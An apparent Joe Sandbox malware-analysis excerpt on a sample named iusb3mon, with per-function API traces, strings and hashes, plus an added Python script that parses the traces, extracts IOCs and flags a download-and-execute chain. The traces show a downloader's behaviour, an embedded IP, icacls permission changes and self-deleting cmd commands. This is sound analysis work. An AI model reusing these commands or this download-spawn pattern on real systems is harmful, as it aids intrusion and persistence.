• Opcode Fuzzy Hash: 2cc012d97424f53e1f01738e0336b2d610f4f7a18d33b82856de7e12d966bd77
• Instruction Fuzzy Hash: 4141AC315242586EFB5AA614DC4EFFA7F9DBB01740F0904F4DAC5CB192C2794A44DBA3
APIs
  • Part of subcall function 06246316: DeleteFileA.KERNEL32(?,062444DD,00000000,00000001), ref: 06246344
  • Part of subcall function 06246316: LoadLibraryA.KERNEL32(wininet.dll), ref: 06246357
  • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0624636E
  • Part of subcall function 06246316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0624638E
  • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0624639A
  • Part of subcall function 06246316: FreeLibrary.KERNEL32(00000000), ref: 062463BC
  • Part of subcall function 062495BC: GetFileAttributesA.KERNEL32(06245CC4,06245CC4,00000000), ref: 062495C0
  • Part of subcall function 062495BC: GetLastError.KERNEL32 ref: 062495CB
• CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06244519
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressFileLibraryProc$AttributesConnectCreateDeleteErrorFreeInternetLastLoadProcess
• String ID: D$WinSta0\Default
• API String ID: 1472976565-1101385590
• Opcode ID: 358d4c4948e68ae109643cf393e99b20724d15a457b364914083c3c54894ae48
• Instruction ID: e9668233c77a7ed5d8996cd3d07160eb841ce5db2ae73a2c6078b9fd38739428
• Opcode Fuzzy Hash: 358d4c4948e68ae109643cf393e99b20724d15a457b364914083c3c54894ae48
• Instruction Fuzzy Hash: 1D01C4739212152AEB98B7E4AC04FEF77ACEF05365F100426FE12EA045EA749645CAE1
APIs
• wsprintfA.USER32 ref: 06245C98
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 06245CAE
  • Part of subcall function 062495BC: GetFileAttributesA.KERNEL32(06245CC4,06245CC4,00000000), ref: 062495C0
  • Part of subcall function 062495BC: GetLastError.KERNEL32 ref: 062495CB
  • Part of subcall function 06245AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
  • Part of subcall function 06245AA1: RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B09
  • Part of subcall function 06245AA1: RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06245B14
  • Part of subcall function 06245AA1: wsprintfA.USER32 ref: 06245B3C
  • Part of subcall function 06245AA1: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06245B5C
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: FileOpenwsprintf$AttributesCloseDownloadErrorLastQueryValue
• String ID: c:\%s
• API String ID: 2251979229-3279930864
• Opcode ID: f85e518c836970b9f20847a531857a00e41e8cd568576fa79dc86822fd5e5369
• Instruction ID: 46e5cbae4469d10932b560654a927d499255816c4da29e3190a97988020be80e
• Opcode Fuzzy Hash: f85e518c836970b9f20847a531857a00e41e8cd568576fa79dc86822fd5e5369
• Instruction Fuzzy Hash: D8110A72A643157AFBA4B7A4DC88FEB376CDF04350F240465FE15F1081EA749A448691
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,06246C72,?,?,?,202.79.169.178), ref: 062470E9
Strings
• SYSTEM\CurrentControlSet\Services\, xrefs: 062470B3
• 202.79.169.178, xrefs: 0624709C
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Open
• String ID: 202.79.169.178$SYSTEM\CurrentControlSet\Services\
• API String ID: 71445658-4084533604
• Opcode ID: 281a9c64337ed2a9638a3bd175184e6ff8d6e9d66a19807be1167299358f9c45
• Instruction ID: d2ee83f1d59bfcf9f8923bd18effcfb1dd02c4c7ac45f809b68230d366fbea9c
• Opcode Fuzzy Hash: 281a9c64337ed2a9638a3bd175184e6ff8d6e9d66a19807be1167299358f9c45
• Instruction Fuzzy Hash: 32F0A776A6C21C7AEBA0E6B4DC46FE9736CDB14700F1004E1B7C5F1081EEF0AAC88A51
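Read together, the three function blocks above from the 06240000 dump (the CreateProcessA caller at 06244519 with its 06246316 and 062495BC callees, the URLDownloadToFileA caller at 06245CAE, and the RegOpenKeyExA caller at 062470E9) describe a plain HTTP downloader: wininet.dll is loaded at run time and InternetOpenA / InternetOpenUrlA are resolved by name through GetProcAddress, InternetConnectA is called with nServerPort 0x50 (80) and dwService 3 (INTERNET_SERVICE_HTTP), a file is deleted and then fetched with URLDownloadToFileA to a path formatted by wsprintfA (the block's String ID is c:\%s), and CreateProcessA launches it with lpDesktop WinSta0\Default; the value 0x44 among its stack arguments is 68, the size of a 32-bit STARTUPINFOA, which is also the "D" in that block's String ID. The last block opens HKEY_LOCAL_MACHINE (handle 0x80000002) with KEY_ALL_ACCESS (0x000F003F) under SYSTEM\CurrentControlSet\Services\ and carries the embedded string 202.79.169.178. The script below is an added example, not part of this Joe Sandbox report or of the sample's own code: it parses this per-function text format, decodes the registry constants and the port, extracts the IP, DLL and registry-path IOCs, and flags the download-then-spawn chain. Its input is constructed by copying the API and Strings lines printed above; the capability labels are the example's own, not Joe Sandbox signature names.

```python
"""Triage a Joe Sandbox per-function API listing for a download-and-execute chain.
Added example, not part of the report: parses the 'APIs' / 'Strings' text of the blocks
above, decodes registry constants, pulls IOCs and labels capabilities."""
import re

# Constructed input: API and Strings lines of three functions from the 06240000 dump,
# copied from the report above with its indentation removed.
SAMPLE = r"""
APIs
  • Part of subcall function 06246316: DeleteFileA.KERNEL32(?,062444DD,00000000,00000001), ref: 06246344
  • Part of subcall function 06246316: LoadLibraryA.KERNEL32(wininet.dll), ref: 06246357
  • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0624636E
  • Part of subcall function 06246316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0624638E
  • Part of subcall function 06246316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0624639A
• CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06244519
Strings
Memory Dump Source
APIs
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 06245CAE
  • Part of subcall function 06245AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
Strings
Memory Dump Source
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,06246C72,?,?,?,202.79.169.178), ref: 062470E9
Strings
• SYSTEM\CurrentControlSet\Services\, xrefs: 062470B3
• 202.79.169.178, xrefs: 0624709C
Memory Dump Source
"""

API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                    r"(?P<api>[A-Za-z0-9_:]+)\.(?P<mod>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^(?P<s>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
REG_PREFIXES = ("SYSTEM\\", "SOFTWARE\\")
# Predefined HKEY handles and access masks as the report prints them (values from winreg.h).
HKEYS = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
ACCESS = {"000F003F": "KEY_ALL_ACCESS", "00020019": "KEY_READ", "00020006": "KEY_WRITE"}
SIMPLE = {"URLDownloadToFileA": "http download to file", "InternetOpenUrlA": "http download to file",
          "CreateProcessA": "process creation", "DeleteFileA": "file deletion"}

def parse_blocks(text):
    """One dict per function: its API calls (with callee attribution) and its strings."""
    blocks, cur, mode = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        line = line[2:] if line.startswith("• ") else line
        if line == "APIs":
            cur = {"apis": [], "strings": []}
            blocks.append(cur)
            mode = "apis"
        elif line in ("Strings", "Memory Dump Source"):
            mode = "strings" if line == "Strings" else None
        elif cur is not None and mode == "apis" and (m := API_RE.match(line)):
            cur["apis"].append({"api": m["api"], "mod": m["mod"], "ref": m["ref"],
                                "sub": m["sub"], "args": m["args"].split(",") if m["args"] else []})
        elif cur is not None and mode == "strings" and (m := STR_RE.match(line)):
            cur["strings"].append({"s": m["s"], "xref": m["xref"]})
    return blocks

def registry_opens(block):
    """(hive, access mask, call site) for every RegOpenKeyEx* call in the block."""
    return [(HKEYS.get(c["args"][0], c["args"][0]), ACCESS.get(c["args"][3], c["args"][3]), c["ref"])
            for c in block["apis"] if c["api"].startswith("RegOpenKeyEx") and len(c["args"]) >= 4]

def capabilities(block):
    """Labels are this example's own, not the report's signature names."""
    names = {c["api"] for c in block["apis"]}
    resolved = {c["args"][1] for c in block["apis"] if c["api"] == "GetProcAddress" and len(c["args"]) > 1}
    caps = {label for api, label in SIMPLE.items() if api in names or api in resolved}
    if "LoadLibraryA" in names and resolved:
        caps.add("dynamic import: " + ", ".join(sorted(resolved)))
    for c in block["apis"]:
        if c["api"] == "InternetConnectA" and len(c["args"]) > 2:
            caps.add(f"http connect port {int(c['args'][2], 16)}")  # 00000050 is port 80
    paths = [s["s"] for s in block["strings"] if s["s"].upper().startswith(REG_PREFIXES)]
    for hive, access, _ in registry_opens(block):
        if hive == "HKEY_LOCAL_MACHINE" and any("\\SERVICES" in p.upper() for p in paths):
            caps.add(f"service configuration access under {hive}\\{paths[0]} ({access})")
        else:
            caps.add(f"registry open {hive} ({access})")
    return caps

def triage(text):
    """Per-block capabilities, decoded registry opens, IOCs and the chain verdict."""
    blocks = parse_blocks(text)
    caps = [capabilities(b) for b in blocks]
    tokens = [a for b in blocks for c in b["apis"] for a in c["args"]] + [s["s"] for b in blocks for s in b["strings"]]
    flat = set().union(*caps)
    return {"blocks": blocks, "capabilities": caps,
            "registry": [r for b in blocks for r in registry_opens(b)],
            "iocs": {"ipv4": {ip for t in tokens for ip in IPV4_RE.findall(t)},
                     "dlls": {t for t in tokens if t.lower().endswith(".dll")},
                     "registry_paths": {t for t in tokens if t.upper().startswith(REG_PREFIXES)}},
            # fetch-to-disk plus spawn is the downloader chain, as opposed to a plain beacon
            "download_and_execute": "http download to file" in flat and "process creation" in flat}

if __name__ == "__main__":
    for i, caps in enumerate(triage(SAMPLE)["capabilities"]):
        print(f"function block {i}: {sorted(caps)}")
```

Running it on the constructed listing labels block 0 with the dynamic WinINet import, the port-80 connect, the download and the process creation, block 1 with the URLMON download plus an HKEY_CLASSES_ROOT open, and block 2 with the KEY_ALL_ACCESS open under the Services key; the IOC set comes out as the IP, wininet.dll and the registry path, and the chain verdict is true. The argument decoding trusts the report's stack-dword rendering, so the hive and access-mask lookups fall back to the raw hex when a value is not a known constant rather than guessing.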
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 001D1285
  • Part of subcall function 001D3A15: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001D3A21
• ___std_exception_copy.LIBVCRUNTIME ref: 001D12AE
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                    • String ID: string too long
                                                                                                                    • API String ID: 1846318660-2556327735
                                                                                                                    • Opcode ID: 6ade90d0c696962b5eaee50054e57ee68a0ad2cbdb8b5e3b28950e57b8b4c868
                                                                                                                    • Instruction ID: b8e06fe1ba4a1713804bc0ed339d0513ed39e722ad8aef25db5951964c2c6438
                                                                                                                    • Opcode Fuzzy Hash: 6ade90d0c696962b5eaee50054e57ee68a0ad2cbdb8b5e3b28950e57b8b4c868
                                                                                                                    • Instruction Fuzzy Hash: 80E0C272A2075A97C610EFD9EC01886B7DCDE26B507108627F788F7700FBB0A58087A5
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06243E0C
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06243E14
                                                                                                                      • Part of subcall function 06243DF2: DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E1B
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(c:\del,?,?), ref: 06243E38
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E4B
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06243E53
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(000003E8,?,?), ref: 06243E5A
                                                                                                                      • Part of subcall function 06243DF2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06243E6A
                                                                                                                      • Part of subcall function 06243DF2: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06243E83
                                                                                                                      • Part of subcall function 06243DF2: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06243E9A
                                                                                                                    • WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 06243FBA
                                                                                                                    • ExitProcess.KERNEL32 ref: 06243FC2
                                                                                                                    Strings
                                                                                                                    • cmd /c echo.>c:\del & exit, xrefs: 06243FB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exec$Sleep$FileName$DeleteEnvironmentExitModulePathProcessShortVariable
                                                                                                                    • String ID: cmd /c echo.>c:\del & exit
                                                                                                                    • API String ID: 253100718-3921158289
                                                                                                                    • Opcode ID: 762dad9051cdcebd67e881bc1af099209fd42057805143eebe6c8ebf5e886db2
                                                                                                                    • Instruction ID: be93bcdd3052b74c446ad339009a6ad287e49f4e3c64cdc4e0ae4f79b90b893d
                                                                                                                    • Opcode Fuzzy Hash: 762dad9051cdcebd67e881bc1af099209fd42057805143eebe6c8ebf5e886db2
                                                                                                                    • Instruction Fuzzy Hash: 52B012302B0302E7D2E43FB1BC4FF183A11A710B02F019400F74AD84C8CEB001404F12
                                                                                                                    APIs
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0624F2B6,00000000,00000000,00000000,0624AD29,00000000,00000000,06248D56,00000000,00000000,00000000), ref: 0624F516
                                                                                                                    • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0624F2B6,00000000,00000000,00000000,0624AD29,00000000,00000000,06248D56,00000000,00000000,00000000), ref: 0624F54A
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0624F564
                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 0624F57B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap$FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3499195154-0
                                                                                                                    • Opcode ID: 66e8b6c17f26f5c0dffd61821ecf982c741a32bbd2830add276ad9fb7a7c637f
                                                                                                                    • Instruction ID: 0f75f6a5e319bfaa61ec2aa7d645a24a80adbd33cc0119fb5929d71e5ebef723
                                                                                                                    • Opcode Fuzzy Hash: 66e8b6c17f26f5c0dffd61821ecf982c741a32bbd2830add276ad9fb7a7c637f
                                                                                                                    • Instruction Fuzzy Hash: 18114370600302AFD7609F18F94CD267BB7FB847207104A29E692D29E8C774A986CF01
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(06276740,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA3A
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA4C
                                                                                                                    • LeaveCriticalSection.KERNEL32(06276740,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA55
                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA,00000100), ref: 0625CA67
                                                                                                                      • Part of subcall function 0625C9BA: GetVersion.KERNEL32(?,0625CA0F,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA,00000100,06258773), ref: 0625C9CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1193629340-0
                                                                                                                    • Opcode ID: 2455ea9e2a656befc0eff05770a6fbae8935ca247918015c8f21fe99d1347627
                                                                                                                    • Instruction ID: 6c2c63d96ee698f394d727ad76f94231ce84c0ea178a13e9fc7b440e5881dc98
                                                                                                                    • Opcode Fuzzy Hash: 2455ea9e2a656befc0eff05770a6fbae8935ca247918015c8f21fe99d1347627
                                                                                                                    • Instruction Fuzzy Hash: 42F08C7151171BDFCB60EF54F888D92B7AAFB05316B42403ADB5592005E730E549CE91
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0624CD22,?,0624B623), ref: 0624CF6C
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF74
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF7C
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 32694325-0
                                                                                                                    • Opcode ID: fe8fc0bf6d54bf476c70d6d14ab10138073bf95e658da54651f1a0ac4c394c27
                                                                                                                    • Instruction ID: a8edb26bb7b5a0ce0044732bd5654cc824c8c6f1063d2a2df3ccef037ea9b97e
                                                                                                                    • Opcode Fuzzy Hash: fe8fc0bf6d54bf476c70d6d14ab10138073bf95e658da54651f1a0ac4c394c27
                                                                                                                    • Instruction Fuzzy Hash: 6FC0E93580A3789ACB512B55FD4C8493F67EF042A4312C072F6845907186211D11DF91